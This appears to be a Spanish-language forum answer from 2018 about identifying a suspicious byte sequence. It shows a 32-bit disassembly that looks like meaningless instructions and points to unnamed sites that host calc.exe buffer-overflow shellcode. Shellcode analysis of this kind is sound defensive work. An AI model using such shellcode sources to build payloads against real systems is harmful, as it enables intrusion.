000002A5  4D                dec ebp
000002A6  05003904B0        add eax,0xb0043900
000002AB  3904B0            cmp [eax+esi*4],eax
000002AE  3605304E04E0      ss add eax,0xe0044e30
000002B4  4C                dec esp
000002B5  05A0310590        add eax,0x900531a0
000002BA  3804E0            cmp [eax],al
000002BD  4D                dec ebp
000002BE  04C0              add al,0xc0
000002C0  4D                dec ebp
000002C1  04C0              add al,0xc0
000002C3  320510380510      xor al,[dword 0x10053810]
000002C9  3003              xor [ebx],al
000002CB  0032              add [edx],dh
000002CD  0550310300        add eax,0x33150
000002D2  3005A03904F0      xor [dword 0xf00439a0],al
000002D8  4B                dec ebx
000002D9  05203104D0        add eax,0xd0043120
000002DE  330590350540      xor eax,[dword 0x40053590]
000002E4  4A                dec edx
000002E5  04D0              add al,0xd0
000002E7  37                aaa
000002E8  04F0              add al,0xf0
000002EA  4C                dec esp
000002EB  0580380500        add eax,0x53880
000002F0  3305504C0590      xor eax,[dword 0x90054c50]
000002F6  37                aaa
000002F7  0590300590        add eax,0x90053090
000002FC  37                aaa
000002FD  0580340590        add eax,0x90053480
00000302  4D                dec ebp
00000303  05703504D0        add eax,0xd0043570
00000308  4A                dec edx
00000309  05504C0590        add eax,0x90054c50
0000030E  37                aaa
0000030F  05203104D0        add eax,0xd0043120
00000314  4B                dec ebx
00000315  05204B0510        add eax,0x10054b20
0000031A  3505703005        xor eax,0x5307005
0000031F  803004            xor byte [eax],0x4
00000322  E033              loopne 0x357
00000324  05503104B0        add eax,0xb0043150
00000329  4C                dec esp
0000032A  05003904F0        add eax,0xf0043900
0000032F  3105003104C0      xor [dword 0xc0043100],eax
00000335  330570390500      xor eax,[dword 0x53970]
0000033B  3505004F04        xor eax,0x44f0005
00000340  F0300460          lock xor [eax],al
00000344  3205304D0580      xor al,[dword 0x80054d30]
0000034A  4A                dec edx
0000034B  04E0              add al,0xe0
0000034D  4A                dec edx
0000034E  04D0              add al,0xd0
00000350  4A                dec edx
00000351  05303804B0        add eax,0xb0043830
00000356  4A                dec edx
00000357  04E0              add al,0xe0
00000359  4B                dec ebx
0000035A  05                db 0x05
0000035B  00                db 0x00
0000035C  41                inc ecx

También verifiqué el desmontaje de -b 64, sin embargo, me pareció una tontería. Corrígeme si me equivoco aquí. Tal vez puedas averiguar algo desde aquí?

Para referencia, el código de shell de desbordamiento de búfer calc.exe se puede encontrar aquí:

  

enlace

También puede buscar en ese sitio web coincidencias parciales del código de shell que tiene.

También aquí , puede verificar los códigos de shell solo.

  

enlace

    
respondido por el Maximus 19.04.2018 - 16:08
fuente

Lea otras preguntas en las etiquetas